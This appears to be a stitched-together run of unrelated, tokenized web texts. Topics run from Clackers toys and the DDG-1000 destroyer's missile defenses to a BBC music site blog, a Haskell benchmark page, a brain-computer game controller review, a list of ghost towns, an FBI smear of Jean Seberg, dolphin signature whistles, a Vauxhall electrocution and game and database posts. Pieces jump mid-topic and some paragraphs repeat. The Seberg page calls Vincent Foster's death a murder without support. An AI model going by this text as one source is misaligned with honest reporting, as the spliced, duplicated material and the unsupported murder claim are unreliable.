I believe a plastic version may have been released after the original and the more menacing version was pulled , but I do n't think that it enjoyed the same popularity .
One of the main obstacles in locating this toy today is knowing what to call it .
There were supposedly over 80 copy - cat products on the market during Clackers hey - day .
During your search expect to see names like : Bonkers Clackers Clack Clacks Click Clacks Crackers K-Nokkers Ker- Knockers Klackers Klick Klacks Knockers Mini Poppers Moon Rocks Popper Knockers Rockers Super Clackers Quick Klacks Quick Clacks Quick Wacks Wackers Whackers
Whak KOs Because of the abrupt halt in production and distribution there were truckloads of these toys dumped on the secondary market .
This is good for collectors today because it means that there are lots of these toys out there still MIP selling in the $ 10 - $ 20 range .
Two weeks ago , the Navy canceled plans to build the rest of its hulking stealth destroyers .
At first , it looked like the DDG - 1000s ' $ 5 - billion - a - copy price tag was to blame .
Now , it appears the real reason has slipped out :
The Navy 's most advanced warship is all but defenseless against one of its best - known threats .
We already knew that the older , cheaper , Burke - class destroyers ( pictured ) are better able to fight off anti-ship missiles – widely considered the most deadly ( and most obvious ) hazard to the American fleet .
Specifically , the old Burkes can shoot down those missiles using special SM - 3 interceptors ; the new DDG - 1000 cannot .
But now , a leading figure in the Navy , Deputy Chief of Naval
Operations ( and Vice - Admiral ) Barry McCullough , is saying that the DDG - 1000 " cannot perform area air defense " at all .
Never mind the SM - 3 ; the ship is n't designed to fire any
kind of long - range air - defense missile , whatsoever .
It 's presumably limited to the same last - ditch " point defense " systems ( think Phalanx guns and short - range interceptors , like the Evolved Sea Sparrow Missiles ) that cargo ships , aircraft carriers and even Coast Guard cutters carry in case a missile slips past their screening Burkes .
Those point defenses can't intercept ballistic missiles at all – and when they destroy sea-skimming missiles , the debris can still strike and severely damage the ship .
In other words , the world 's most expensive surface warship can't properly defend itself or other ships from an extremely widespread threat .
That , needless to say , is a problem .
Not only is the DDG - 1000 vulnerable to the ballistic anti-ship missiles that countries such as China are developing , it would n't even be particularly effective at protecting fleets against common weapons in the arsenals of everyone from Russia to Iran .
And it 's not like this was some kind of new threat ; these missiles have been around , in one form or another , since World War II .
If that was n't bad enough , the Navy has been saying all along that the DDG - 1000 can
fire at least some of Raytheon 's missile - killing Standard Missiles .
In other words , according to the inestimable Galrahn over at * Information Dissemination * , " the Navy has been delivering a lunch bag of bullshit to Congress regarding surface combatants for three years . "
In a 2005 presentation , for instance , the Navy claimed the ship would have a " 3X survivability rate " against anti-ship missiles and other threats .
The service asserted that the destroyer 's new SPY - 3
radar would give it a " 15X greater detection capability against sea-skimming targets , " a " 10X increase in maximum track capacity , " and a " 20 percent greater firm track range against all anti-ship cruise missiles
( improves survivability ) . "
Of course , the fanciest radar in the world does n't do much good , if there 's no way to respond to the threat .
A Navy source tells Defense News that the new destroyers " could carry and launch
Standard missiles , but the DDG 1000 combat system cant guide those missiles onward to a target . "
And that 's not the only flim - flam going on here .
For years , the Navy insisted that the DDG - 1000 was absolutely crucial , because it could whack targets on land , from far - off at sea .
It always seemed like an odd argument ; could planes hit those targets just as effectively ?
But the Navy stuck to it – repeatedly .
Now : Never mind .
" With the accelerated advancement of precision munitions and targeting , excess fires capacity already exists from tactical aviation , " Adm. McCullough says .
Tell us something we did n't already know .
There may be additional threats , as well .
Defense News is reporting that the Navy has announced that there 's a new " classified threat " against which older Burke - class destroyers are better defended .
One source familiar with the classified briefing said that while anti-ship cruise missiles and other threats were known to exist , those are n't the worst .
The new threat , which­ did n't exist a couple years ago , is a land - launched ballistic missile that converts to a cruise missile .
Other sources confirmed that a new , classified missile threat is being briefed at very high levels .
One admiral , said another source , was told his ships should simply ­stay away .
There are no options .
Information on the new threat remains closely held .
In light of this , Galrahn says , the DDG - 1000 is little more than a renamed , gold - plated version of a shipbuilding scheme that seemingly died more than a decade ago .
That would be the 1990s " Arsenal Ship " concept
( pictured ) , which would have put hundreds of land - attack missiles in a simple , cheap , mostly defenseless hull – perhaps based on a cargo ship .
The Arsenal Ship idea eventually was replaced by the Navy 's four new SSGN submarines that each carry more than 100 cruise missiles and do n't need anti-air missiles , since they can submerge .
" The Navy has not only kept the Arsenal Ship concept alive and well , but they evolved the program from six small dependent combatants into a class of seven independent stealth battleships , then had the program funded and pushed through Congress in plain sight under the pretext of a more capable program , " Galrahn writes .
That 's insider - speak for a simple truth :
The Navy screwed up its premiere ship - building project , big - time .
– David Axe and Noah Shachtman
ALSO :
( Photo : DOD ; art : via FAS )
Those architectures of Antoni Gaudi are beautiful , they looks strange but also are very creative and value .
Barcelona looks beautiful with those .
They are cool , amazing , weird , beautiful , you may call those as you want but you must agree that those buildings are genius and remarkable .
We ( well Nick , Patrick , Tony , Deanna , Sacha and Guy ) have recently been working on a major rewrite of the BBC ’s music site [ beta ] – and since its just gone live as a public beta I thought it would be a good time to explain a bit about what we ’ve done and what we hope to do with the site .
I would also love to hear what you think about what we ’ve done so far – especially as we move from public beta towards a replacement for the current site .
Our work so far has focused on providing core information for every artist the BBC plays on our daytime radio network shows .
That ’s shows like Annie Mac and Chris Moyles on Radio 1 , or Steve Lamacq on 6 Music .
We ’ve focused on these shows because we ’ve integrated the site with the radio playout system VCS dira !
which are basically giant iPods in the basement of Broadcasting House .
Unfortunately the specialist shows as well as national and local radio shows do n’t use these so we have n’t got track listing data in the right format for these programmes .
But we have a plan and will be adding more shows in due course .
So what have done so far ?
For starters we decided that we wanted to have a single canonical page for every artist .
We decided to do this because we want to aggregate everything we know about an artist at a single URL .
But this means that we need unique , persistent , unambiguous URLs .
Thankfully , as Michael has already discussed , Musicbrainz gives us unique identifiers that allow us to provide just such a set of URLs .
The core of the new site then is built around Musicbrainz .
In addition to giving us web scale identifiers Musicbrainz is also being used to give core music metadata e.g. discographies , related artists and related links .
Some of those related links are Wikipedia links and we are using those to go and fetch the introductory text for each artist ’s biography from Wikipedia .
The approach we ’re using to keep the Wikipedia data up to date is , I think , quite neat .
Patrick has written a bot to monitor the Wikipedia IRC channel for updates – when it spots an update we fetch the new Wikipedia content .
Oh and obviously all this data is rendered dynamically using the same MVC framework we are using for / programmes which means that updates happen almost instantaneously .
This brings me to the next major feature – integration with / programmes .
As I ’ve said we have integrated with VCS to give us track listing information for our daytime radio shows – we are matching this data with both our internal database of programme metadata and Musicbrainz .
This lets us know which radio stations and shows have played which artists .
We also want to make this data available for others to use and so have designed the site to provide a RESTful API , following the principles of Linked Data :
… namely thinking of URIs as more than just locations for documents .
Instead using them to identify anything , from a particular person to a particular programme .
These resources in - turn have representations , which can be machine - processable ( through the use of RDF , Microformats , RDFa , etc. ) , and these representations can hold links towards further web resources , allowing agents to jump from one data - set to another .
If you would like to have a play with these we have RDF , XML , JSON and YAML representations of the resources – just add .xml .rdf . json or . yaml to the end of the artist url .
Where next ?
Nick , Michael and I have previous spoken about our plans for linking programmes , music , events , topics and users .
Well this is our first foray into this world .
Information about programmes and music is interesting , it ’s useful ; but it ’s not as interesting nor as useful as when the two are intelligently linked .
Joining the two worlds means that you can aggregate information about the programmes that have played an artist [ as we ’ve done ] , you can put track listings on episode pages , you can have charts of which artists are played most on all BBC Radio programmes , on Radio 1 , by Zane Lowe .
You can also aggregate all episodes that you can currently listen to that feature a given artist .
Or show which programme first played a given artist and how often the BBC has played them since .
Basically the interesting stuff happens at the joins between the nodes because that ’s where the context lives .
By exposing the information that is created by joining programmes and music we can provide context and serendipity .
We can help you find out about the music you ’ve just listened to and introduce you to new shows that also features the music you like .
So that ’s what we ’re working on .
We also need to provide more data about each artist – from both inside and outside the BBC .
That means bringing the album reviews into the fold , hooking up external news feeds and the like .
But whatever we do it ’s worth bearing in mind that this is on a much larger scale than the current music site .
This new site has in the order of 388,398 artist pages , 157,677 external links and 93,912 artist to artist relationships .
It would be great to hear what you think about what we ’ve done and our plans for the future .
You are welcome to leave a comment here , or via the Backstage mailing list .
The ethos
Note :
The example programs in the parallel nofib suite are rather old , and many not updated to work with GUM 4.xx or GUM 5.xx .
To find test programs for these more recent implementations of GpH download the following bundle : example programs for GUM 4.06 onwards .
Check Makefile.boot for basic documentation and build a program with e.g. make parfib_mp .
This repository of programs for Glasgow Parallel Haskell has been inspired by the nofib benchmark suite for the Glasgow Haskell Compiler .
But a note of warning : the programs herein are not state - of - the - art benchmarks , and may not even be parallelised to give the best performance .
The purpose of this code repository is to provide a suite of programs to be used for experimentation into parallelism .
Many of the algorithms have been transcribed from other programming language suites .
A nofib suite subdivides programs into the following categories :
The imaginary part consists of toy programs such as factorial and quicksort .
Such programs are useless for drawing general conclusions , but can sometimes show up nasty performance bugs in sharp relief .
part consists of toy programs such as factorial and quicksort .
Such programs are useless for drawing general conclusions , but can sometimes show up nasty performance bugs in sharp relief .
The spectral part consists of kernels of real programs , such as Fast Fourier Transform .
Again , one should be careful about drawing any general conclusions from these programs , but they are a whole lot more realistic than the imaginary suite whilst still being of modest size .
part consists of kernels of real programs , such as Fast Fourier Transform .
Again , one should be careful about drawing any general conclusions from these programs , but they are a whole lot more realistic than the imaginary suite whilst still being of modest size .
The real part consists of real application programs , written by people who simply wanted to get the job done .
They are larger and more I/O intensive than the imaginary and spectral suite .
nofib
The nofib Benchmark Suite of Haskell Programs
Will Partain , In Functional Programming , Glasgow 1992 , J Launchbury and PM Sansom , eds. , Workshops in Computing , Springer Verlag , 195- 202 .
Download
You can either download the individual programs or you can download everything :
Imaginary subset
parfac Parallel factorial .
parfib Parallel nfib .
quicksort Parallel quicksort .
sieve A parallel version of Eratosthenes algorithm for finding prime numbers .
squares Parallel sum of squares .
Spectral subset
alpha - beta
Finds the next move in the game tic - tac - toe .
barnes - hut An algorithm for the N - body problem .
canny A simple edge detector .
cfd Computational fluid dynamics calculations .
fft A fast Fourier transformation algorithm .
prsa Parallel RSA encryption algorithm .
quickhull
An algorithm for finding a convex hull .
ray A simple ray tracer for polygons .
soda Searches for words in a grid of letters .
Runciman and Wakeling ( version 6 ) .
Strategies version .
spheres A simple ray tracer for spheres .
Real subset
circuit A data - parallel digital circuit simulator .
Other parallel code repositories
NESL
A library of parallel algorithms for the NESL language .
A library of parallel algorithms for the NESL language .
Impala - IMplicitly PArallel LAnguage Application Suite
A suite of programs in the id language .
Page last modified : 1999/02/25
While game controllers come in all shapes , sizes and colors , the input technologies they feature are surprisingly universal .
Nearly all game controllers receive some or all of their input from various switches of some type .
More advanced controllers may also incorporate analog sticks , throttle wheels , visual sensors and motion sensors .
Regardless of which combination of these input technologies are incorporated into a controller , the end result is nearly always a device that is controlled with the hands or feet , so it was quite refreshing to learn that OCZ 's idea of a game controller does n't require any of your extremities to operate .
Technology has laid claim to being the first company to bring a " brain - computer " interface to the retail market and they have aimed it squarely at the gamer .
The device is called the NIA , which is an acronym that stands for Neural Impulse Actuator , and instead of buttons , sticks , gyroscopes or motion sensors , it reads the body 's natural biosignals and translates them into commands that can be used to control PC games .
Gaming controllers , be it a gamepad , joystick , wheel or mouse , are some of the central defining elements of any gaming experience .
Any gamer with a modicum of experience knows how a bad controller or control scheme can completely ruin the experience of playing an otherwise excellent game .
Judging from the huge variety of input devices available , we put a high value on the kind of immersiveness that a good controller - to - game match can create .
While game controllers come in all shapes , sizes and colors , the input technologies they feature are surprisingly universal .
Nearly all game controllers receive some or all of their input from various switches of some type .
More advanced controllers may also incorporate analog sticks , throttle wheels , visual sensors and motion sensors .
Regardless of which combination of these input technologies are incorporated into a controller , the end result is nearly always a device that is controlled with the hands or feet , so it was quite refreshing to learn that OCZ 's idea of a game controller does n't require any of your extremities to operate .
OCZ Technology has laid claim to being the first company to bring a " brain - computer " interface to the retail market and they have aimed it squarely at the gamer .
The device is called the NIA , which is an acronym that stands for Neural Impulse Actuator , and instead of buttons , sticks , gyroscopes or motion sensors , it reads the body 's natural biosignals and translates them into commands that can be used to control PC games .
The NIA is able to detect three types of biosignals generated by your brain , facial muscles and eye muscles via a special headband .
The user can bind these signals to any keystroke using the driver and configuration software .
This allows the NIA to take the place of any keyboard command in any game .
OCZ claims the NIA allows for a new level of immersion not possible with traditional tactile input devices .
Not to mention the obvious advantage in input response time that a brain - computer interface could provide .
Now you may be understandably skeptical , as we certainly were .
The whole concept of the NIA sounds more than a little outlandish .
When we first heard of OCZ 's interesting " brain - computer " interface a couple of years ago , we could n't help but have visions of The Matrix .
The very notion of controlling a computer with the mind conjures up images of exotic , fictional technologies from sci- fi movies .
We were also slightly skeptical about the NIA 's ability to improve our gaming experience , even if it were to work as advertised .
Do n't get us wrong , controlling the computer hands - free with our mind sure sounds neat , but we really like our mice , keyboards and gamepads .
Perhaps we 're old fashioned but there is at least one member of the HotHardware team that thinks the keyboard and mouse are the only input devices you will ever need , well at least for the foreseeable future .
As pundits at a computer hardware publication , there is only one way we know how to settle our suspicions and curiosity , as well as try and shed some light on this product for you .
So we 've obtained a retail - ready NIA sample and have put it through its paces to see for ourselves if it's the real deal or just another gimmick product .
The Ghost City – an apocalyptic inspiration for filmmakers for as long as I can remember .
There is nothing more surreal than witnessing an abandoned city , and writers through the ages have grabbed hold of this fact with both hands .
Introducing us to all forms of abandonment .
From the 1948 Ghost - Town - Western ‘ Yellow Sky ’ starring Gregory Peck , to the deserted London streets of Danny Boyle ’s ’ 28 Days Later ’ .
The frightful tension associated with popular 90’s video game ‘ Silent Hill ’ , to the post - apocalyptic nothingness of Cormac McCarthy ’s Pulitzer - winning novel ‘ The Road ’ .
The theme is well - trodden , everywhere you may choose to glance .
An excellent backdrop to any form of entertainment , whether it be film , literature or anything else for that matter .
There is however some degree of foundation to this surreality .
The ghost town is common among the Americas , especially in the Central and Southern states .
Surveys suggest that there are around 6,000 abandoned sites of settlement in Kansas alone .
But what can cause such large - scale loss of population ?
One of the main factors is depleting natural resources , linking to roads and railways bypassing certain places .
Another more sinister cause can be disaster , whether natural or man-made .
Such was the case with Pattonsburg , Missouri .
After being flooded over 30 times since their town was founded in 1845 , residents tired after two floods in 1993 .
With government help , the whole town was rebuilt three miles away , now known as New Pattonsburg , leaving the old Pattonsburg behind as a ghost town .
However it happens , the topic interests me greatly .
Here I list my top ten most interesting abandoned places on the planet , complete with description and pictures .
Hoping to bring some essence of real life to what many consider an extremely fictional occurence .
Making film sets out of real life locations along the way .
Enjoy !
10 Bodie , California
Founded in 1876 , Bodie is the authentic American ghost town .
It started life as a small mining settlement , though found even more fortune from nearby mines that attracted thousands .
By 1880 Bodie boasted a population of almost 10,000 – such was the boom .
At its peak , 65 saloons lined the town ’s main street , and there was even a Chinatown with several hundred Chinese residents .
Dwindling resources proved fatal however , and although greatly reduced in prominence , Bodie held a permanent residency through most of the 20th century .
Even after a fire ravaged much of the downtown business district in 1932 .
Bodie is now unpopulated .
The town was designated a National Historic Landmark in 1961 , and in 1962 it became Bodie State Historic Park as the few residents left moved on .
Today , Bodie is preserved in a state of arrested decay .
Only a small part of the town survives .
Visitors can walk the deserted streets of a town and interiors remain as they were left and stocked with goods .
Bodie is open all year , but the long road that leads to it is usually closed in the winter due to heavy snowfall , so the most comfortable time to visit is during the summer months .
9 San Zhi , Taiwan
More of a modern choice this time .
Below is an abandoned City in the North of Taiwan .
In the area of ‘ San Zhi ’ , this futuristic pod village was initially built as a luxury vacation retreat for the rich .
However , after numerous fatal accidents during construction , production was halted .
A combination of lack of money and lack of willingness meant that work was stopped permanently , and the alien like structures remain as if in remembrance of those lost .
Indeed , rumors in the surrounding area suggest that the City is now haunted by the ghosts of those who died .
After this the whole thing received the cover - up treatment .
And the Government , who commissioned the site in the first place was keen to distance itself from the bizarre happenings .
Thanks to this , there are no named architects .
The project may never be restarted thanks to the growing legend , and there would be no value in re-developing the area for other purpose .
Maybe simply because destroying homes of lonely spirits is a bad thing to do .
San Zhi can also be seen from an aeriel view here .
8 Varosha , Cyprus
Varosha is in the Turkish occupied city of Famagusta in Cyprus .
It was previously a modern tourist area , and flowered into one of the most luxurious holiday destinations .
In the year of 1974 however , the Turkish invaded Cyprus and tore up the island .
Citizens fled , expecting to be able to return to their homes within days .
The Turkish military wrapped it in barbed wire and now controls it completely .
Allowing nobody to enter to this day , aside from themselves and UN personnel .
The buildings are slowly falling apart .
Though on the positive side , rare sea turtles have begun nesting on the deserted beaches .
The Annan Plan had provided for the return of Varosha to Greek Cypriot control , but after the rejection of the proposal by Greek Cypriot voters this hand - over to Greek - Cypriots has not materialized .
That is not the end of the story , as the Governments are working together to plan a complete revival of Varosha to its former beauty .
Currently , three concept hotel complexes have been designed by Laxia Inc .
And by 2010 , the de facto “ Turkish Republic of Northern Cyprus ” will apparently open Varosha to tourism once again .
7 Gunkanjima , Japan
Hashima Island ( ?? ; meaning Border Island ) is one among 505 uninhabited islands in the Nagasaki Prefecture of Japan about 15 kilometers from Nagasaki itself .
It is also known as “ Gunkan - jima ” or Battleship Island thanks to its high sea walls .
It began in 1890 when a company called Mitsubishi bought the island and began a project to retrieve coal from the bottom of the sea .
This attracted much attention , and in 1916 they were forced to build Japan ’s first large concrete building on the island .
A block of apartments that would both accommodate the seas of workers and protect them from hurricanes .
In 1959 , population had swelled , and boasted a density of 835 people per hectare for the whole island ( 1,391 per hectare for the residential district ) – one of the highest population densities ever recorded worldwide .
As petroleum replaced coal in Japan in the 1960 ’s , coal mines began shutting down all over the country , and Hashima ’s mines were no exception .
In 1974 Mitsubishi officially announced the closing of the mine , and today it is empty and bare , with travel currently prohibited .
The island was the location for the 2003 film ‘ Battle Royale II ’ and inspired the final level of popular Asian videogame ‘ Killer7 ’ .
6 Balestrino , Italy
Balestrino is quite a strange case in that it was extremely difficult to find any decent information on it .
At least on the abandonment itself .
No one is quite sure when the town was established , though records date back to before the eleventh century – when Balestrino was owned by the Benedictine abbey of San Pietro dei Monti .
As you can see from the pictures , the upper part of the town consists of a Castle ( of Marquis ) and the lower part a parish church ( of Sant ’ Andrea ) .
Records of population go back to around 1860 , when around 800 - 850 people lived there .
Mainly famers who took advantage of the landscape to farm olive trees .
In the late nineteenth century , the North - West coast of Italy was struck by numerous earhquakes .
One of these in 1887 ( magnitude 6.7 ) destroyed some villages in the area of Savona , and although no official records show Balestrino was affected it coincides with much repair work and a dip in population .
Finally in 1953 the town was abandoned due to ‘ geological instablility ’ , and the remaining inhabitants ( around 400 ) were moved to safer ground to the west .
The derelict part of Balestrino that has stood untouched and inaccessible for fifty plus years is currently undergoing planning for redevelopment .
Today around 500 people remain in the town ’s newer area which is a good kilometer down the road .
5 Katoli World , Taiwan
I thought I would break out of the abandoned residential mould and look at something inspired by Miyazaki ’s Oscar winning ‘ Spirited Away ’ .
Those who have seen it will know that the family stumbles across an old theme park at the start of the movie , one that was built in the eighties but has since lost popularity and been abandoned .
Well this is a usual occurence in Asia , one can find many amusement parks that have been left to rust .
Here is just one of them , though one that was forced to close for something other than financial loss .
Katoli World is situated in the Dakeng Scenic area just outside of Taichung , Taiwan .
Opened in the mid eighties , it enjoyed moderate success as one of the few theme parks on the island of Taiwan to host a rollercoaster ( two ) .
The park was closed after a massive earthquake on September 21st , 1999 .
Thousands of people were killed during the quake but nobody inside the park as it struck after opening hours .
Large areas of the park were destroyed and it was forced to close .
A place once vivid with young laughter is now slowly turning to rust .
4 Centralia , Pennsylvania
Johnathan Faust opened Bull ’s Head Tavern in Centralia in 1841 , and Centralia was incorporated as a borough in 1866 .
The anthracite coal industry was the principal employer in the community until the 1960s , when most of the companies went out of business .
An exposed vein of coal ignited in 1962 thanks to weekly garbage burning , and as a result a huge underground coal fire commenced .
Attempts to extinguish the fire were unsuccessful , and it continued to burn throughout the 1960s and 1970s .
Adverse health effects were reported by several people due to the carbon monoxide produced .
In 1979 , locals became aware of the scale of the problem when a gas station reported a fuel temperature of 172 degrees Fahrenheit ( 77.8 °C ) .
This provoked widespread attention , boosted in 1981 when a 12 - year - old almost plunged to his death as a 4 foot wide , 150 foot deep sinkhole suddenly opened beneath his feet .
In 1984 , $ 42 million was spent on relocation , with most residents moving to the nearby Mount Carmel and Ashland .
In 1992 , Pennsylvania condemned all houses within the borough , meaning that of the 1,000 + residents in 1981 – only a handful now remain – mainly priests .
The fire still rages on , and according to experts could do so for another 250 years .
3 Yashima , Japan
Yashima is an imposing plateau to the northeast of Takamatsu , the second largest city on Shikoku – which is one of Japan ’s major islands .
This plateau stretches out to sea , and can be seen in the fifth photo below .
It is the site of a famous battle that took place on 22nd March 1185 during the Genpei War .
The top of Yashima hosts the Yashima Temple , which is a well - known Shikoku pilgrimage .
This is about the only thing that does draw crowds to this strangely neglected geographical anomaly , but it was n’t always so .
During an upsurge in mid-eighties ’
Japanese economy , the people of Takamatsu decided that the plateau was an excellent place to encourage tourism , so took to pouring money into developing this sacred land .
Six hotels were built , along with many parks and trails – even an aquarium .
Though somewhere along the line people realized that Yashima plateau was n’t so such an attractive opportunity , especially with views of the nearby rock quarry .
Visitor numbers then dropped as millions of Yen were lost on inflated real - estate deals .
All the hotels and shops were forced to shut down , as was the cable car that at one point transported many to Yashima ’s heights .
2 Pripyat , Ukraine
Pripyat is an abandoned city in the Zone of alienation in northern Ukraine , Kiev Oblast , near the border with Belarus .
The city population had been around 50,000 – and had been home to most of the Chernobyl Nuclear Power Plant workers .
Then the Chernobyl disaster struck in 1986 and the place was abandoned due to threat of radiation .
Afterwards Pripyat acted like a museum for a long time , perfectly showing a slice of Soviet life .
However at some time at the beginning of the 21st century the place was looted heavily , nothing was left behind – even toilet seats were stolen .
The city will not be safe for human habitation for several years to come , and even then it will be a long time before people consider it healthy to develop once again .
Before the power plant was built , concerns were voiced at its planned closeness to the city of Kiev .
They had planned to build it only 25 km away , placing the capital at risk from pollution amongst other things .
However after a long debate they decided to build Chernobyl along with Pripyat 100 km away from Kiev .
A choice that would in the end prove to be a wise one .
1 Craco , Italy
Craco is located in the Region of Basilicata and the Province of Matera .
About 25 miles inland from the Gulf of Taranto at the instep of the “ boot ” of Italy .
This medieval town is typical of those in the area , built up with long undulating hills all around that allow for the farming of wheat and other crops .
Craco can be dated back to 1060 when the land was in the ownership of Archbishop Arnaldo , Bishop of Tricarico .
This long - standing relationshop with the Church had much influence over the inhabitants throughout the ages .
In 1891 , the population of Craco stood at well over 2,000 people .
Though there had been many problems , with poor agricultural conditions creating desperate times .
Between 1892 and 1922 over 1,300 people moved from the town to North America .
Poor farming was added to by earthquakes , landslides , and War – all of which contributed to this mass migration .
Between 1959 and 1972 Craco was plagued by these landslides and quakes .
In 1963 the remaining 1,800 inhabitants were transferred to a nearby valley called Craco Peschiera , and the original Craco remains in a state of crumbling decay to this day .
Contributor : JediMoonShyne
COINTELPRO
The Smearing of Jean Seberg
This is another example of the tactics used by the Federal Bureau of Investigation to stifle legitimate dissent in Hollywood .
Following my going public about the inconsistancies I found in the Vincent Foster affair , I was subjected to similar treatment .
Jean Seberg , a well known actress in the 60s , became pregnant and the FBI sent out letters to the gossip columnists identifying the baby 's father as a Black Panther , in order to cheapen Seberg 's image .
The scans below are of the official FBI letter from Los Angeles to Washington D.C. asking permission for the scam .
Click for full size picture of page one of the letter requesting permission for the smearing of Jean Seberg .
Click for full size picture of page two of the letter requesting permission for the smearing of Jean Seberg
The text of the letter .
" Bureau permission is requested to publicize the pregnancy of Jean Seberg , well - known movie actress by ( name deleted ) Black Panther ( BPP ) ( deleted ) by advising Hollywood " Gossip - Columnists " in the Los Angeles area of the situation .
It is felt that the possible publication of Seberg 's plight could cause her embarrassment and serve to cheapen her image with the general public . " ' It is proposed that the following letter from a fictitious person be sent to local columinists : " I was just thinking about you and remembered I still owe you a favor .
So ----
I was in Paris last week and ran into Jean Seberg , who was heavy with baby .
I thought she and Romaine [ sic ] had gotten together again , but she confided the child belonged to ( deleted ) of the Black Panthers , one ( deleted ) .
The dear girl is getting around ! " ' Anyway , I thought you might get a scoop on the others .
Be good and I 'll see you soon .
' Love , " ' Sol. , " Usual precautions would be taken by the Los Angeles Division to preclude identification of the Bureau as the source of the letter if approval is granted . "
The results of the letter .
Permission was granted , but with the suggestion that the smear be delayed until Jean Seberg 's pregnancy was in a very obvious condition .
Click for full size picture of the letter granting permission for the smearing of Jean Seberg .
The story was then run by Los Angeles Times propagandist Joyce Haber .
Click for full size picture of the Haber Article that launched the smear .
The story was picked up by Newsweek and the international press .
The shock of the story was so severe that Jean Seberg suffered a miscarriage .
The funeral for the child was held with an open casket , so that the lie stood revealed in it 's most tragic form .
Jean Seberg , her baby dead and her career shattered by this outright lie , attempted suicide several times , finally succeeding in a French Hotel .
Click for full size picture of memo that accompanied copy of the Haber story sent to FBI files ..
( The name which was redacted from the memo during the FOIA process is thought by many to have been Raymond Hewit , a Black Panther leader .
His " outright lie " was far more direct .
The FBI typed up a letter on official FBI stationary identifying Hewit as an informant and planted it where other Black Panthers would find it in the hopes that Hewit would then be killed . )
Following Seberg 's death , the Los Angeles Times , the key instrument of her torment , issued a statement by the FBI .
" The days when the FBI used derogatory information to combat advocates of unpopular causes have long since passed .
We are out of that business forever . "
The Senate committee that looked into COINTELPRO disagreed , however .
" Cointelpro activities may continue today under the rubric of ' investigation . '
( From my own experiences in Hollywood following my interest in the Vincent Foster murder , I can attest that the Senate committee has a far more accurate grasp of reality . )
Back To The Political Page .
Back To The Political Page .
Mail to :
By Anna-Marie Lever
Science and Nature reporter , BBC News
Bottlenose dolphins call to their newborns to ensure they can identify mum
Female bottlenose dolphins whistle 10 times more often than usual after giving birth in order to help newborns recognise who is " mum " .
The findings by a US team appear in the journal Marine Mammal Science .
These " signature whistles " are unique to each animal , allowing them to be used for identification .
Bottlenose dolphins are highly social ; in their first weeks , calves encounter many adult females that they could potentially mistake for their mothers .
Please turn on JavaScript .
Media requires JavaScript to play .
" The most obvious explanation for the increase in maternal signature whistle production is the need for the mother to be in contact with her calf , " zoologist Dr Deborah Fripp from Dallas Zoo suggested .
" However , the decrease in signature whistle production of [ dolphin ] mother Lotty after three weeks does not fit this idea , especially as calves actually wander further from their mothers as they get older . "
Please turn on JavaScript .
Media requires JavaScript to play .
Instead , Dr Fripp said a likely purpose of this whistling enables a process called imprinting , whereby the calf learns to recognise its mother .
" Bottlenose dolphins can swim at birth and are highly social .
In other species , these traits are associated with imprinting .
A calf can easily get separated from its mother and find itself among many other dolphins . "
In some bird species , the critical period for imprinting is as short as a few hours .
In some mammals , it is the first few weeks of life .
Please turn on JavaScript .
Media requires JavaScript to play .
Imprinting may also help stop females from stealing newborns from other mothers .
This behaviour has been reported before in bottlenose dolphins ( Tursiops truncatus ) , and newborn Lotus was stolen on day one , though subsequently returned .
" Theft incidents almost always occur in the first day of the calf 's life .
Perhaps this is because after a calf has imprinted on its mother , such theft is more difficult , " Dr Fripp explained .
Please turn on JavaScript .
Media requires JavaScript to play .
Although dolphins can whistle at birth , they are not born with their unique signature whistle .
" Dolphin mothers do not teach their babies how to whistle , so the increase in whistle production at birth is not for this , " Dr Fripp said .
She added : " Calves ' whistles are almost never similar to their mothers ' .
Interestingly , female calf whistles are more similar to those animals in their environment which they are not interacting with than to those of animals they know . "
In captivity Dr Fripp investigated maternal whistle use in four captive dolphins at Kolmardens Djurpark in Kolmarden , Sweden .
The females were named Nephele , Vicky , Delphi and Lotty .
The four females each had their own calf .
Unfortunately , all but the last calf born - Lotus , the son of Lotty - died within two weeks of life .
" It is sad that the calves died .
The infant mortality rate was high , but this year is not representative , " said Dr Fripp .
" Infant mortality rate in the wild is not known - if a calf is born and dies within a week it probably wo n't be recorded .
In captivity it is . "
As soon as Lotus was born , Vicky stole him and took him to the surface .
Lotus remained with Vicky until day six when he was removed from the pool for a day of medical treatment .
On his return , he was reclaimed by rightful mother Lotty .
Dr Fripp added : " Unfortunately , with only one calf surviving to week three , and a calf with an unusual first week at that , the evidence to show a return to normal levels of maternal signature whistle production is not particularly strong .
Future work is needed to examine this . "
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Polish tourist killed by urinating on 750 - volt electric railway line
Electrocuted : A 41 - year - old man died after being hit with 750 volts at Vauxhall Station
A tourist who relieved himself over a live railway line at a south London station was electrocuted .
The Polish man died when an electric current connected with urine which had splashed on to the 750 - volt line .
It is thought the married 41 - year - old teacher was on a trip to London to improve his English .
Workers found his body slumped over a track at Vauxhall station after he was seen by staff at the station .
They had earlier spotted him on CCTV screens walking into a recess area but failing to reappear .
Rail workers fear the victim may not have known that some tracks in Britain are electrified .
It took police a week to identify the victim after the tragedy , which happened at around 5 pm .
A source said : ' Perhaps because he was from Poland he had no idea the rail was electrified .
His family back home is heartbroken . '
The station has no toilets , but there are public toilets nearby .
August 11 , 2008 - Robin Walker
We 've been a little quiet for the last week as we 've put the finishing touches on the Heavy update .
We thought the Pyro pack was the biggest we'd be doing for a while , due to the large changes to the Pyro , but the Heavy update has turned out to be even bigger .
In addition to the three unlockable weapons and thirty - five achievements for the Heavy , we 've got a new game mode with five new arenas for it , a new Payload map focusing on more open spaces than Goldrush , and another popular community - made map .
Throughout the rest of the week we 'll be giving you the details on all this , and if all goes well , you 'll have your hands on it shortly afterwards .
The community - made map included in the Heavy update is cp_steel , by Jamie ' Fishbus ' Manson .
After the Pyro update we received a lot of email telling us how wrong we were in our choices , and cp_steel was an easy next choice due to the way it dominated the suggestions .
If you 're firing up your email right now to tell us that we never get anything right , please include suggestions of what map(s ) we should be looking at next .
We 'll be updating A Heavy Update site with more info daily .
Stay tuned !
I remember reading Disk is the new Tape earlier this year and how much it resonated .
That 's probably because I was working for Yahoo at the time and hearing a lot about their use of Hadoop for data processing .
In fact , I even did a couple videos ( 1 and 2 ) about that .
Anyway , I recently faced the reality of this myself .
When I wrote about The Long Term Performance of InnoDB I 'd been beating my head against a wall trying to get millions of records out of InnoDB efficiently .
It was taking days to get all the records .
Yes , days !
After joking that it'd probably be faster to just dump the tables out and do the work myself in Perl , I thought about Disk is the new Tape and realized what I was doing wrong .
Allow me to offer some background and explain ...
There are several tables involved in the queries I needed to run .
